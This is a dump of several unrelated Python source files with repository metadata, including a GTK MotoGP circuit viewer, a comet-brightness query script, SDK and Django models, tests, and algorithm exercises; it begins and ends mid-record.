query =" CREATE TABLE circuitos (id int(10) auto_increment primary key,gran_premio varchar(100) not null,nombre varchar(100) not null,longitud varchar(100),anchura varchar(100),curvas_der int(2),curvas_izq int(2),recta_larga varchar(100),fecha_construccion varchar(100),fecha_modificacion varchar(100))ENGINE=INNODB"
micursor.execute(query)
Conexion.commit()
else:
query = " Select id from circuitos "
num = micursor.execute(query)
if num != 18 :
tabla_correcta=False
if not tabla_records:
query =" CREATE TABLE records_circuitos (id int(10) auto_increment primary key,id_circuito int(10) not null,categoria varchar(100) not null,record varchar(100) not null,temporada int(4) not null,piloto varchar(100) not null,motocicleta varchar(100),tiempo varchar(100),velocidad varchar(100),foreign key (id_circuito) references circuitos(id) on delete cascade)ENGINE=INNODB;"
micursor.execute(query)
Conexion.commit()
if not tabla_circuitos or not tabla_records or not tabla_correcta:
return False
else:
return True
def onInitialCircuit(self,boton):
self.onVerCircuito(boton)
self.window_inicial.hide()
self.window.show_all()
def onVerCircuito(self,menuitem):
        #Load the circuit image and the country flag
imagen = self.builder.get_object('imagen_circuito')
circuito = menuitem.get_label()
imagenes = self.cargar_imagenes(circuito)
imagen.set_from_file(imagenes[0])
        #Load the information and the records
self.cargar_informacion_circuito(circuito)
self.cargar_records_circuito(circuito)
        #Use the country flag as the window icon
self.window.set_icon_from_file(imagenes[1])
bandera = self.builder.get_object('imagen_bandera')
bandera.set_from_file(imagenes[1])
self.window.set_title("Circuito de %s" % circuito)
def onShowAbout(self,menuitem):
about = self.builder.get_object("about_dialog")
about.run()
about.destroy()
def onActualizarCircuitos(self,item):
        #If the item label is "Aceptar", the call comes from the
        #table-check error dialog,
        #so we skip the update-confirmation dialog
if(item.get_label() != "Aceptar"):
dialogo = self.builder.get_object("dialogo_actualizar")
respuesta = dialogo.run()
else:
respuesta = 1
self.cargar_circuitos_iniciales()
self.window_inicial.show_all()
self.dialogo.hide()
if respuesta == 1 :
self.ejecutar_scrapper()
            #Once the data is updated, tell the user.
            #Hide the buttons to force the window to be closed
            #and keep the user from touching the main window
texto = self.builder.get_object("label_actualizando")
texto.set_label("Informacion de los circuitos Actualizada")
boton = self.builder.get_object("button_aceptar")
boton.hide()
boton = self.builder.get_object("button_cancelar")
boton.hide()
else:
dialogo.destroy()
def __init__(self):
self.builder = Gtk.Builder()
self.builder.add_from_file("interfaz.glade")
self.handlers = { "onDeleteWindow": Gtk.main_quit,
"onVerCircuito": self.onVerCircuito,
"onActualizarCircuitos":self.onActualizarCircuitos,
"onInitialCircuit":self.onInitialCircuit,
"onShowAbout":self.onShowAbout
}
self.builder.connect_signals(self.handlers)
self.window = self.builder.get_object("window1")
self.window_inicial = self.builder.get_object("window2")
self.grandes_premios = { 'Qatar':'QAT' ,
'España':'SPA',
'Portugal':'POR',
'Francia':'FRA',
'Cataluña':'CAT',
'Gran Bretaña':'GBR',
'Holanda':'NED',
'Alemania':'GER',
'Italia':'ITA',
'Estados Unidos':'USA' ,
'Indianapolis':'INP',
'Republica Checa':'CZE',
'San Marino':'RSM' ,
'Aragon':'ARA',
'Japon':'JPN' ,
'Malasia':'MAL',
'Australia':'AUS',
'Valencia':'VAL'}
        #Check the database before showing any window
if (self.comprobar_tablas()):
self.cargar_circuitos_iniciales()
self.window_inicial.show_all()
else:
self.dialogo = self.builder.get_object('dialogo_error_tablas')
self.dialogo.show_all()
def main():
window = Moto_GP()
Gtk.main()
return 0
if __name__ == '__main__':
main()
|
[
"josevalenzuelaperez@gmail.com"
] |
josevalenzuelaperez@gmail.com
|
29d967e22202502a0489bcd8d31f34e6cac31bb2
|
5be9fc95e24d4ee571f0edc4039caf7465563c06
|
/Problems/The army of units/main.py
|
4e708eb8148ea805daaa5c7bcaecb6adabfd7925
|
[] |
no_license
|
helenlavr/Coffee-Machine
|
8a7e4ad83e36925d991346c8e87b6ccdb9c59681
|
938cfec67390185b929ccfca0d00dbdbb4ba489f
|
refs/heads/master
| 2023-01-01T21:27:22.449491
| 2020-10-15T10:40:41
| 2020-10-15T10:40:41
| 304,292,890
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 232
|
py
|
units = int(input())
if units >= 1000:
print('legion')
elif units >= 500:
print('swarm')
elif units >= 50:
print('horde')
elif units >= 10:
print('pack')
elif units >= 1:
print('few')
else:
print('no army')
|
[
"helenlav@stud.ntnu.no"
] |
helenlav@stud.ntnu.no
|
9afe8e0f69ee47f22bd74b8e222360bc796ad45f
|
308dbc263ab71b1f424d9130e11e9d7d65de7945
|
/model/Armadura.py
|
b0bfbfb7f8a310b5b26c4f0a22391d0d5c685a2e
|
[] |
no_license
|
rfgonzalez13/MHRiseApp
|
37cdb415568a6fc302899ea17da3746858809ae9
|
5166ef4c2027bfc6e7e9510eb1cfbbc50562e5a0
|
refs/heads/master
| 2023-07-25T08:49:31.516496
| 2021-09-09T15:40:26
| 2021-09-09T15:40:26
| 373,656,668
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 440
|
py
|
# coding = utf-8
from google.appengine.ext import ndb
class Armadura(ndb.Model):
nombre = ndb.StringProperty(required=True, indexed=True)
pk_nombre = ndb.StringProperty(required=True, indexed=True)
casco = ndb.IntegerProperty(indexed=True)
cota = ndb.IntegerProperty(indexed=True)
brazales = ndb.IntegerProperty(indexed=True)
faja = ndb.IntegerProperty(indexed=True)
grebas = ndb.IntegerProperty(indexed=True)
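# Editor's sketch: creating and persisting an entity with this model
# (assumes a configured App Engine / NDB environment)
def crear_armadura_ejemplo():
    armadura = Armadura(nombre='Ejemplo', pk_nombre='ejemplo',
                        casco=10, cota=10, brazales=10, faja=10, grebas=10)
    return armadura.put()  # returns the stored entity's ndb.Key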
|
[
"rfgonzalez@esei.uvigo.es"
] |
rfgonzalez@esei.uvigo.es
|
49abdf437aff0bb64af3510ebc54df23c69483f5
|
7e3a860c5204ad3ba4320f7a5d5bb0d796c3d4fa
|
/scripts/helper/get_brightness.py
|
71fe14c7820506038407f1584509000df49518af
|
[] |
no_license
|
dot361/Weak-radio-signal-data-processing
|
9a019b5bdd1258b9acf9852122f03588df67f12d
|
2f305263948016470c27da222e72d41a9e802a26
|
refs/heads/master
| 2022-11-14T21:53:28.041898
| 2020-07-06T13:48:28
| 2020-07-06T13:48:28
| 268,297,606
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,715
|
py
|
import urllib
from datetime import datetime,timedelta
import sys
import numpy
def get_ra_dec(start_time, stop_time, obj):
lat = 21.847222;
lon = 57.5593055;
alt = 10;
step_size = '1 h'
if(obj == "panstarrs"):
obj_name = 'C/2017 T2'
if(obj == "atlas"):
#obj_name = 'C/2019 Y4'
obj_name = '90004451'
if(obj == "swan"):
#obj_name = 'C/2019 Y4'
obj_name = 'C/2020 F8'
coord_str = str(lat)+','+str(lon)+','+str(alt)
url = "https://ssd.jpl.nasa.gov/horizons_batch.cgi?batch=1&COMMAND='"+ obj_name +"'&CENTER='coord'&SITE_COORD='"+ coord_str +"'&MAKE_EPHEM='YES'&TABLE_TYPE='OBSERVER'&START_TIME='"+ start_time +"'&STOP_TIME='" + stop_time+ "'&STEP_SIZE='"+ step_size +"'&QUANTITIES='1,9'&CSV_FORMAT='YES'"
print(url)
s = urllib.urlopen(url).read()
result = ((s.split("$$SOE"))[1].split("$$EOE")[0]).split('\n')
#print("result", len(result))
#print("result", result[2])
date = list()
mag = list()
for i in result:
if(len(i) != 0):
#print(i)
data = i.replace(" ", "")
#print("data", data)
split_rez = data.split(',')
split_rez[4] = split_rez[4].replace("+","")
date.append(split_rez[0])
mag.append(split_rez[5])
#print(date)
print(mag)
print(len(mag), len(date))
    index_min = min(range(len(mag)), key=lambda i: float(mag[i]))  # compare magnitudes numerically, not as strings
print(index_min)
maxBrightness = mag[index_min]
dateIndex = date[index_min]
print(maxBrightness, dateIndex)
#print(split_rez[0], split_rez[5], split_rez[4], split_rez[6])
return date, mag
get_ra_dec(sys.argv[1], sys.argv[2], sys.argv[3])
|
[
"s7_jasmon_g@venta.lv"
] |
s7_jasmon_g@venta.lv
|
7f027308fcfb3c04e668a3e684a1c89c3d18adba
|
9b64f0f04707a3a18968fd8f8a3ace718cd597bc
|
/huaweicloud-sdk-lts/huaweicloudsdklts/v2/model/delete_log_stream_request.py
|
03161ca879c09c3628e30d67bc31b138c95aef90
|
[
"Apache-2.0"
] |
permissive
|
jaminGH/huaweicloud-sdk-python-v3
|
eeecb3fb0f3396a475995df36d17095038615fba
|
83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b
|
refs/heads/master
| 2023-06-18T11:49:13.958677
| 2021-07-16T07:57:47
| 2021-07-16T07:57:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,000
|
py
|
# coding: utf-8
import re
import six
class DeleteLogStreamRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'log_group_id': 'str',
'log_stream_id': 'str'
}
attribute_map = {
'log_group_id': 'log_group_id',
'log_stream_id': 'log_stream_id'
}
def __init__(self, log_group_id=None, log_stream_id=None):
"""DeleteLogStreamRequest - a model defined in huaweicloud sdk"""
self._log_group_id = None
self._log_stream_id = None
self.discriminator = None
self.log_group_id = log_group_id
self.log_stream_id = log_stream_id
@property
def log_group_id(self):
"""Gets the log_group_id of this DeleteLogStreamRequest.
        The group ID of the log group that contains the log stream to delete; typically a 36-character string.
:return: The log_group_id of this DeleteLogStreamRequest.
:rtype: str
"""
return self._log_group_id
@log_group_id.setter
def log_group_id(self, log_group_id):
"""Sets the log_group_id of this DeleteLogStreamRequest.
        The group ID of the log group that contains the log stream to delete; typically a 36-character string.
:param log_group_id: The log_group_id of this DeleteLogStreamRequest.
:type: str
"""
self._log_group_id = log_group_id
@property
def log_stream_id(self):
"""Gets the log_stream_id of this DeleteLogStreamRequest.
        The ID of the log stream to delete. For how to obtain it, see "Obtaining the Account ID, Project ID, Log Group ID, and Log Stream ID" (https://support.huaweicloud.com/api-lts/lts_api_0006.html).
:return: The log_stream_id of this DeleteLogStreamRequest.
:rtype: str
"""
return self._log_stream_id
@log_stream_id.setter
def log_stream_id(self, log_stream_id):
"""Sets the log_stream_id of this DeleteLogStreamRequest.
        The ID of the log stream to delete. For how to obtain it, see "Obtaining the Account ID, Project ID, Log Group ID, and Log Stream ID" (https://support.huaweicloud.com/api-lts/lts_api_0006.html).
:param log_stream_id: The log_stream_id of this DeleteLogStreamRequest.
:type: str
"""
self._log_stream_id = log_stream_id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
return json.dumps(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DeleteLogStreamRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
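# Editor's sketch: building and inspecting the request model; the IDs below
# are placeholders, not real resource identifiers.
if __name__ == "__main__":
    request = DeleteLogStreamRequest(
        log_group_id="00000000-0000-0000-0000-000000000000",
        log_stream_id="11111111-1111-1111-1111-111111111111")
    print(request)  # __repr__ delegates to to_str(), emitting the JSON form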
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
0dacff2c236fe90e948a6c0b3fecb7e82d6c3d1a
|
d05a59feee839a4af352b7ed2fd6cf10a288a3cb
|
/xlsxwriter/test/comparison/test_chart_font04.py
|
bf7ebe1e1cb139da22fb9e4d7fff60c429f6eb5e
|
[
"BSD-2-Clause-Views"
] |
permissive
|
elessarelfstone/XlsxWriter
|
0d958afd593643f990373bd4d8a32bafc0966534
|
bb7b7881c7a93c89d6eaac25f12dda08d58d3046
|
refs/heads/master
| 2020-09-24T06:17:20.840848
| 2019-11-24T23:43:01
| 2019-11-24T23:43:01
| 225,685,272
| 1
| 0
|
NOASSERTION
| 2019-12-03T18:09:06
| 2019-12-03T18:09:05
| null |
UTF-8
|
Python
| false
| false
| 1,669
|
py
|
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2019, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('chart_font04.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'bar'})
chart.axis_ids = [43944960, 45705472]
data = [
[1, 2, 3, 4, 5],
[2, 4, 6, 8, 10],
[3, 6, 9, 12, 15],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
worksheet.write_column('C1', data[2])
chart.add_series({'values': '=Sheet1!$A$1:$A$5'})
chart.add_series({'values': '=Sheet1!$B$1:$B$5'})
chart.add_series({'values': '=Sheet1!$C$1:$C$5'})
chart.set_title({
'name': '=Sheet1!$A$1',
'name_font': {'bold': 0, 'italic': 1},
})
chart.set_x_axis({
'name': 'Sheet1!$A$2',
'name_font': {'bold': 0, 'italic': 1},
})
chart.set_y_axis({
'name': '=Sheet1!$A$3',
'name_font': {'bold': 1, 'italic': 1},
})
worksheet.insert_chart('E9', chart)
workbook.close()
self.assertExcelEqual()
|
[
"jmcnamara@cpan.org"
] |
jmcnamara@cpan.org
|
4a11b48179794959d216c089d888dbd02e6e7ace
|
cbf3482a35083844a34d9fdfb6d9754164b8c8f7
|
/blog/migrations/0030_postlike.py
|
c1fd1ad7536e7b8009c153d81e8af6146d316cf6
|
[] |
no_license
|
sopilnyak/technotrack-web1-spring-2017
|
f27abb15f2f563b44a544c430e743d961a0d11a9
|
5f4573b417d71347f746660754faae3166be854f
|
refs/heads/master
| 2021-01-21T08:15:21.078499
| 2017-04-17T17:02:55
| 2017-04-17T17:02:55
| 83,340,481
| 0
| 0
| null | 2017-02-27T17:59:56
| 2017-02-27T17:59:56
| null |
UTF-8
|
Python
| false
| false
| 878
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-17 01:24
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('blog', '0029_auto_20170417_0124'),
]
operations = [
migrations.CreateModel(
name='PostLike',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Post')),
],
),
]
|
[
"o.sopilniak@gmail.com"
] |
o.sopilniak@gmail.com
|
f08c3e33a0eea3128e92594b3a26b4ec9ff3d9d2
|
ce2474b35aaa600947ee4bfcd521f90382f2eb15
|
/test_lcm_simulation.py
|
10209a6f4a6c74d14d0e09d6505c0a0b0009f4bb
|
[] |
no_license
|
SEMCOG/semcog_urbansim
|
9ebb5ea8fa195570ff659d8dc40b3c8e86d23a89
|
07809c2f03ea43a43c8d801b08d500f2aaf139f3
|
refs/heads/forecast_2050
| 2023-08-17T23:31:31.845339
| 2023-08-17T20:52:22
| 2023-08-17T20:52:22
| 37,195,829
| 7
| 12
| null | 2023-09-07T15:54:18
| 2015-06-10T12:29:19
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,039
|
py
|
import orca
import os
import yaml
from urbansim_templates.models import LargeMultinomialLogitStep
from urbansim_templates import modelmanager as mm
mm.initialize('configs/elcm_2050')
def generate_yaml_configs():
hlcm_yaml = os.listdir('configs/hlcm_2050')
hlcm_yaml = ["hlcm_2050/"+path for path in hlcm_yaml if '.yaml' in path]
elcm_yaml = os.listdir('configs/elcm_2050')
elcm_yaml = ["elcm_2050/"+path for path in elcm_yaml if '.yaml' in path]
obj = {
'hlcm': hlcm_yaml,
'elcm': elcm_yaml
}
with open("./configs/yaml_configs_2050.yaml", 'w') as f:
yaml.dump(obj, f, default_flow_style=False)
if __name__ == "__main__":
generate_yaml_configs()
import models
orca.add_injectable('year', 2020)
orca.run(["build_networks_2050"])
orca.run(["neighborhood_vars"])
# advance the simulation year to 2030
orca.add_injectable('year', 2030)
orca.run(["mcd_hu_sampling"])
# orca.run(['elcm_800003'])
orca.run(['hlcm_125'])
orca.run(['nonres_repm11'])
print('done')
|
[
"xie@semcog.org"
] |
xie@semcog.org
|
f052c9274c97d671c506f9299e5eac7729340135
|
edb0a9a6649296968076024ce9dbd64f91a79d4e
|
/Codes/tmp.py
|
3869b97a7dff099b932375203c076defc389772e
|
[] |
no_license
|
Pierre-FrancoisW/Master-Thesis
|
94f1253345ee5a0f88c9c95c913d1ac5dfb67666
|
f1e4bb02194c43753855b17589a32ff281396d98
|
refs/heads/main
| 2023-07-13T21:58:24.058295
| 2021-08-25T09:58:08
| 2021-08-25T09:58:08
| 399,195,160
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,447
|
py
|
import numpy as np
#
# Official Code for Classification_local_mda
#
counter = 0
counter1 = 0
counter2 = 0
def prob_node_left(tree, node, uniform):
    # tree.children_left[node] == node + 1 as long as node is not a leaf
if uniform:
return 0.50
else:
return tree.n_node_samples[tree.children_left[node]] / tree.n_node_samples[node]
def exploreC(tree, node, children_right_view, sample, feature_view, x, uniform):
global counter, counter1, counter2
# Stop exploration as we meet a leaf
if tree.feature[node] == -2:
value = tree.value[node].ravel() / tree.value[node].max()
return value
# else check current split and define next direction
    # propagate the sample in both directions when the feature of interest is tested at the current node
elif feature_view[node] == x:
counter += 1
l_prob = prob_node_left(tree, node, uniform)
r_prob = 1 - l_prob
value1 = exploreC(tree, node + 1, children_right_view, sample, feature_view, x, uniform)
value2 = exploreC(tree, children_right_view[node], children_right_view, sample, feature_view, x, uniform)
return l_prob * value1 + r_prob * value2
else:
if sample[tree.feature[node]] <= tree.threshold[node]:
counter1 += 1
# left child is next node
return exploreC(tree, node+1, children_right_view, sample, feature_view, x, uniform)
else:
counter2 += 1
return exploreC(tree, children_right_view[node], children_right_view, sample, feature_view, x, uniform)
def weighted_prediction_C(tree, prediction, nodes_id, leaf, children_right_view, sample, feature_view, x, uniform):
    node = nodes_id[0]
    # direction taken by the sample at this split
    direction = 'right' if leaf >= children_right_view[node] else 'left'
    l_prob = prob_node_left(tree, node, uniform)
    r_prob = 1 - l_prob
    if l_prob > 1:
        print("Error lprob")
    if r_prob > 1:
        print("Error rightprob")
    if nodes_id.size == 1:
        if direction == 'left':
            # propagate the sample to the right as the decision path goes left at this node
            return (prediction * l_prob) + (r_prob * exploreC(tree, children_right_view[node], children_right_view, sample, feature_view, x, uniform))
        # propagate the sample to the left as the decision path goes right
        return (prediction * r_prob) + (l_prob * exploreC(tree, node + 1, children_right_view, sample, feature_view, x, uniform))
    nodes_id = nodes_id[1:]
    if direction == 'left':
        return (r_prob * exploreC(tree, children_right_view[node], children_right_view, sample, feature_view, x, uniform)) + (l_prob * weighted_prediction_C(tree, prediction, nodes_id, leaf, children_right_view, sample, feature_view, x, uniform))
    return (l_prob * exploreC(tree, node + 1, children_right_view, sample, feature_view, x, uniform)) + (r_prob * weighted_prediction_C(tree, prediction, nodes_id, leaf, children_right_view, sample, feature_view, x, uniform))
def compute_mda_local_treeC(Ctree, X, nsamples, nfeatures, nclass, vimp, uniform):
    # use Ctree.value[node]
    children_right_view = Ctree.children_right
    feature_view = Ctree.feature
    node_indicator = Ctree.decision_path(X)
for i in range(nsamples):
# features of decision path (from 0 to n_features-1)
# Discard leaf from node path
features = feature_view[node_indicator[i, :].indices][:-1]
unique_f = np.unique(features)
# node id of decision path
nodes = node_indicator[i, :].indices[:-1]
prediction = Ctree.predict(X)[i].ravel()
prediction = prediction/ np.max(prediction)
leaf = node_indicator[i, :].indices[-1]
for x in unique_f:
# nodes id of the decision path of sample i that test feature 'x'
nodes_id = nodes[features == x]
val = weighted_prediction_C(Ctree, prediction, nodes_id, leaf, children_right_view, X[i], feature_view, x, uniform)
vimp[i, x, :] = vimp[i, x, :] + val
return vimp
def compute_mda_local_ens_C(ens, X, uniform):
nsamples = X.shape[0]
nfeatures = X.shape[1]
nclass = ens.classes_.size
    vimp = np.zeros((nsamples, nfeatures, nclass))
# Dim1 : samples, Dim2: feature, Dim3: class
nestimators = ens.n_estimators
for i in range(nestimators):
# print("o", end='', flush=True)
vimp = compute_mda_local_treeC(ens.estimators_[i].tree_, X, nsamples, nfeatures,nclass, vimp, uniform)
print("")
vimp /= (ens.n_estimators)
for i in range(0,nsamples):
for j in range(0,nfeatures):
vimp[i, j, :] = vimp[i, j, :] * (1/sum(vimp[i, j, :]))
print("counter equals {}".format(counter))
print("counter 1 equals {}".format(counter1))
print("counter 2 equals {}".format(counter2))
return vimp
def Classification_vimp(vimp, predictions, y):
nsamples, nfeatures, c = vimp.shape
vimp2 = np.zeros((nsamples, nfeatures))
for i in range(0,nsamples):
for j in range(0,nfeatures):
#vimp2[i,j] = sum(vimp[i,j,:]) - vimp[i,j,y[i]]
vimp2[i, j] = (1 - predictions[i][y[i]]) - (1 - vimp[i, j, y[i]])
return vimp2
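# Hedged usage sketch, not part of the original file: the functions above read
# ens.estimators_[i].tree_, ens.classes_ and ens.n_estimators, so a fitted
# scikit-learn RandomForestClassifier is assumed; the dataset is illustrative.
if __name__ == "__main__":
    from sklearn.datasets import load_iris
    from sklearn.ensemble import RandomForestClassifier
    X, y = load_iris(return_X_y=True)
    X = X.astype(np.float32)  # the low-level Tree API expects float32 inputs
    ens = RandomForestClassifier(n_estimators=10, random_state=0).fit(X, y)
    vimp = compute_mda_local_ens_C(ens, X, uniform=True)
    # features never tested along a sample's paths keep zero rows in vimp,
    # which the final normalization turns into a divide warning
    vimp2 = Classification_vimp(vimp, ens.predict_proba(X), y)
    print(vimp2.shape)  # (n_samples, n_features)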
|
[
"noreply@github.com"
] |
Pierre-FrancoisW.noreply@github.com
|
e80667808902da02160f366d3c3fbe610cd032e0
|
831451f5d88c630ce5d3c6f495a016118a0c36ad
|
/rest-service/manager_rest/test/endpoints/test_depup_utils.py
|
73784be30c89ee0bd8b6a472e95d6ca2fd8ede88
|
[
"Apache-2.0"
] |
permissive
|
TS-at-WS/cloudify-manager
|
8c3eb713a2f86da6e6cde1d976969733db53f2dd
|
3e062e8dec16c89d2ab180d0b761cbf76d3f7ddc
|
refs/heads/master
| 2021-03-04T22:18:25.591541
| 2020-03-02T16:03:41
| 2020-03-09T09:19:26
| 246,069,993
| 0
| 0
|
Apache-2.0
| 2020-07-29T16:35:22
| 2020-03-09T15:18:04
| null |
UTF-8
|
Python
| false
| false
| 2,658
|
py
|
import unittest
from manager_rest.deployment_update import utils
class DeploymentUpdateTestCase(unittest.TestCase):
def test_traverse_object(self):
object_to_traverse = {
'nodes': {
'n1': 1,
'n2': ['l2', {'inner': [3]}]
}
}
# assert the value returned from a dictionary traverse
self.assertEqual(
utils.traverse_object(object_to_traverse, ['nodes', 'n1']), 1)
# assert access to inner list
self.assertEqual(utils.traverse_object(object_to_traverse,
['nodes', 'n2', '[0]']), 'l2')
# assert access to a dict within a list within a dict
self.assertEqual(utils.traverse_object(object_to_traverse,
['nodes', 'n2', '[1]', 'inner', '[0]']), 3)
self.assertDictEqual(object_to_traverse,
utils.traverse_object(object_to_traverse,
[]))
def test_create_dict_with_value(self):
dict_breadcrumb = ['super_level', 'mid_level', 'sub_level']
self.assertDictEqual({'super_level': {
'mid_level': {
'sub_level': 'value'
}
}}, utils.create_dict(dict_breadcrumb, 'value'))
def test_create_dict_with_no_value(self):
dict_breadcrumb = ['super_level', 'mid_level', 'sub_level', 'value']
self.assertDictEqual({'super_level': {
'mid_level': {
'sub_level': 'value'
}
}}, utils.create_dict(dict_breadcrumb))
def test_get_raw_node(self):
blueprint_to_test = {
'nodes': [{'id': 1, 'name': 'n1'}, {'id': 2, 'name': 'n2'}]
}
# assert the right id is returned on existing node
self.assertDictEqual(utils.get_raw_node(blueprint_to_test, 1),
{'id': 1, 'name': 'n1'})
# assert no value is returned on non existing id
self.assertEqual(len(utils.get_raw_node(blueprint_to_test, 3)), 0)
# assert nothing is return on invalid blueprint
self.assertEqual(len(utils.get_raw_node({'no_nodes': 1}, 1)), 0)
def test_parse_index(self):
self.assertEqual(utils.parse_index('[15]'), 15)
self.assertFalse(utils.parse_index('[abc]'))
self.assertFalse(utils.parse_index('[1a]'))
self.assertFalse(utils.parse_index('~~[]'))
def test_check_is_int(self):
self.assertTrue(utils.check_is_int('123'))
self.assertFalse(utils.check_is_int('abc'))
self.assertFalse(utils.check_is_int('ab12'))
|
[
"mxmrlv@gmail.com"
] |
mxmrlv@gmail.com
|
7279f4e7aeaa3ac8756f44479f75a752a49c2500
|
aa0ff41682eb3b66d3577eb806821126a2d3ace2
|
/18. 四数之和/four_sum.py
|
16af2dc43c31588b055445608fc94fa557c1fe79
|
[] |
no_license
|
qybing/LeetCode
|
11c3b88b7536ae4790d1b481f37741b2c5e9bcce
|
bafa85fde597a17b6dee8cfdd0153a7176ff8fcf
|
refs/heads/master
| 2023-02-06T09:14:29.516336
| 2020-12-30T07:33:37
| 2020-12-30T07:33:37
| 103,499,568
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,141
|
py
|
#! python3
# _*_ coding: utf-8 _*_
# @Time : 2020/5/19 9:58
# @Author : Jovan
# @File : four_sum.py
# @desc :
def fourSum(nums, target):
nums.sort()
length = len(nums)
result = []
for i in range(length):
if i >= 1 and nums[i] == nums[i - 1]:
continue
for j in range(i + 1, length):
if j > i+1 and nums[j] == nums[j-1]:
continue
start = j + 1
end = length - 1
while start < end:
sum_ = nums[i] + nums[j] + nums[start] + nums[end]
if sum_ < target:
start += 1
elif sum_ > target:
end -= 1
else:
result.append([nums[i], nums[j], nums[start], nums[end]])
while start < end and nums[start+1] == nums[start]:
start += 1
while start < end and nums[end-1] == nums[end]:
end -= 1
end -= 1
start += 1
return result
nums = [1, 0, -1, 0, -2, 2]
target = 0
print(fourSum(nums, target))
|
[
"qiaoyanbing1@163.com"
] |
qiaoyanbing1@163.com
|
bf806c4adf32732ebf9c1fe7bd0d8226e8786132
|
c6f95907558349991ed5d350359b51ad4af4b634
|
/projectName/subpackage_1/__init__.py
|
a39f8fe5b38d180873bc20e04f625c8771462801
|
[] |
no_license
|
mitchell-dawson/untitledProject
|
e773802e007c1c1759985f68cfd665e080f2b763
|
f54687d45c2ce787394d7f34244926c9993638ac
|
refs/heads/main
| 2023-01-23T22:34:00.442837
| 2020-11-27T16:40:51
| 2020-11-27T16:40:51
| 316,551,487
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 134
|
py
|
# General store format (access everything, no order)
from .moduleA import *
# Online store format (explicit, ordered access)
# from . import moduleB
|
[
"mitchell.dawson7@hotmail.com"
] |
mitchell.dawson7@hotmail.com
|
0e252a730c01e23c0749c29858d12daba11eeda6
|
d89aa6be7a7661c9955d143eed11cb8a526091c4
|
/src/main/com/dong/database/demo/mysql/create_database.py
|
04036f11a7250d5ae3368e7f379eefb496bbb472
|
[] |
no_license
|
weidongcao/finance_spider
|
366e209371319b961c587dfdcd37eed5dcb06a6d
|
4e210548d93c9d01101b26556f4342099df67c37
|
refs/heads/master
| 2021-01-24T04:34:34.367440
| 2019-08-25T07:03:14
| 2019-08-25T07:03:14
| 122,943,048
| 5
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 386
|
py
|
"""
Example: connect to MySQL from Python and create a database.
"""
import pymysql
db = pymysql.connect(host='cm02.spark.com', user='root', password='123123', port=3306)
cursor = db.cursor()
cursor.execute('select version()')
data = cursor.fetchone()
print('Database version: ', data)
cursor.execute('create database spiders default character set utf8 collate utf8_general_ci')
db.close()
|
[
"1774104802@qq.com"
] |
1774104802@qq.com
|
e440d2c140932d115fb47dd81b71b07e16609724
|
6189f34eff2831e3e727cd7c5e43bc5b591adffc
|
/WebMirror/management/rss_parser_funcs/feed_parse_extractLuxiufer.py
|
4e0f1d83bb26fb14a4a67239ee9051bb1a167144
|
[
"BSD-3-Clause"
] |
permissive
|
fake-name/ReadableWebProxy
|
24603660b204a9e7965cfdd4a942ff62d7711e27
|
ca2e086818433abc08c014dd06bfd22d4985ea2a
|
refs/heads/master
| 2023-09-04T03:54:50.043051
| 2023-08-26T16:08:46
| 2023-08-26T16:08:46
| 39,611,770
| 207
| 20
|
BSD-3-Clause
| 2023-09-11T15:48:15
| 2015-07-24T04:30:43
|
Python
|
UTF-8
|
Python
| false
| false
| 342
|
py
|
def extractLuxiufer(item):
"""
Parser for 'Luxiufer'
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or 'preview' in item['title'].lower():
return None
if 'WATTT' in item['tags']:
return buildReleaseMessageWithType(item, 'WATTT', vol, chp, frag=frag, postfix=postfix)
return False
|
[
"something@fake-url.com"
] |
something@fake-url.com
|
180e788b1edfb6a7fbd2064e95711bc278e96ab5
|
b737ed73e7b64c004c56b57e80aaa884a25ec98a
|
/likeapp/models.py
|
